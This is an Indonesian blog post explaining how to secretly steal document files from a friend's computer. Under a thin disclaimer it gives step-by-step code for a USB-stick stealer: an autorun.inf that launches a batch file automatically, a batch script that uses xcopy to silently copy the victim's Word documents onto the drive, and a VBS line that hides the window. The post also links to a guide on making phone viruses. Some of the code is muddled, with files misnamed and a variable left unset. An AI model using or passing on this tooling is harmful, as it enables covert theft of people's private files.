English French German Spain Russian Japanese Arabic Chinese Simplified
Home » , , » CARA MENCURI FILE DOKUMEND DARI KOMPUTER TEMAN

CARA MENCURI FILE DOKUMEND DARI KOMPUTER TEMAN

Nah sobat untuk kali ini baim akan shre legi nih dengan sobat tentang : Cara mencuri file dokumend dari komputer teman.

Gimana tertarik Untuk artikel yang stau ini. pastinya doonk karna snagat membantu. biasanya kita kaloo minta lagu,file,gambar,video itu kan kalo di copy/paste kan pasti ketahuan. kenapa? 

Masalah.!
  1. Biasanya File atau besar file nya
  2. Kalo File nya besar Otomatis Copy nya lama.
  3. jadi gak bisa sembunyi sembunyi deh kalo mencuri hehehe..

Contoh Kecil aja ya sobat buat kalian. Misal nya kalian di suruh guru kalian buat documen Sederhana. atau buat surat undangan sederhana. Tapi kalian tidak bisa, ada salah satu teman kalian dia sudah bisa tapi tidak mau memberi tahu. nah dari sini kita kan mengambil nya dengan cara diam.diam.

Eitzz. Tapi bukan Berarti Kita Terbebas dari dosa ya. karna yg namanya mencuri apapun, entah itu barang kecil,besar atau sesuatau apapun. ya tetap saja kalo mencuri dosa. iakan. tanggung sendiri lo. di sini baim hanya menambah pengetahuan aja supaya lebih waspada.!

Nah  sacaranya Pun sangat Mudah..lo mauo..
Tapi sebelum nya baim sudah share lo dengan sobat tentang : Cara membuat Virus Hp Lewa Sms

Buat sobat yng ingin sekali buat virus lewat Hp silahkan Klik di --- sini ---

Jika sudah kita lanjutkan yukk
Cara yg pertama
  • Buka Notepad di komputer/laptop sobat Lalu Copy/Paste Code di bawh

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
  •  Nah kalo sudah silahkan simpan di flashdisc sobat simpan dengan nama : autorun.inf
Langkan yg ke-2
  • Buka Kembali Notepad lalu copas Code nya di bawah 

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls

  •  Simpan di flashdisc sobat dengan nama : file.bat
Langkah ke-3
  • Buka Lagi Notepad nya dan copas lagi code di bawah

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
  •  Simpan di flasdisc sobat dengan nama  : launch.bat
Langkah ke 4
  • Buka kembali Notpad lalu copas code di bawah

wscript.exe \invisible.vbs file.bat

 Kalo sudah silahkan cek lagi apakah file yang kita buat tadi sudah tersimpan dengan benar. kalo sudah. silahkan buat Folder baru dengan nama basing terserah sobat. nah kalo sudah. sebelum kita mencuri file dari teman kita kita coba jajal dulu di komputer kita atau di warnet apakah sudah berjalan dengan lancar . kalo sudah ya berarti silahkan di pakai. 

Perhatian..!!
Kami hanya memberi tahu bukan untuk bermaksud apapun. kami hanya ingan and atau bahwa banyak sekali sekrang yang suka jahil atau isesng maka berhati hati lah.!









 
Hi. sobat. apakah anda suka dengan asrtikel di atas? kalo anda suka silahkan anda Klik di sini Supaya bisa berlangganan lewat e-mail. dan anda akan mendapatkan artikle terbaru dari SHIQUERS.COM

0 comments:

Post a Comment

- Buat sobat silahkan berkomentar. apabila Terdapat Link yang Rusak.!
- Luankan Waktu sedikit untuk berkomentar di blog ini, demi kemajuan blog ini.
- kalo sobat gak punya akun, G-mail. silahkan komentar menggunakan
Anonymous
- komentarlah dengan perkataan yang baik, dan samakan dengan Artikel yang
di bahas
- kalo sobat perlu bantuan silahkan klik Batuan di atas. /REQUEST

Rating

Related Posts Plugin for WordPress, Blogger...

Mau berlangganan atau dapatkan artikel terbaru langsung ke e-mail kamu yuk masukin email kamu di bawah.:

Delivered by FeedBurner

 
Lihat : Tentang Blog | Jgn asal copas | Pisi Misi
Copyright ©2011- 2013. SHIQUERS.COM - All Rights Reserved
Created By Baim
Kebijakan Pripacy Policy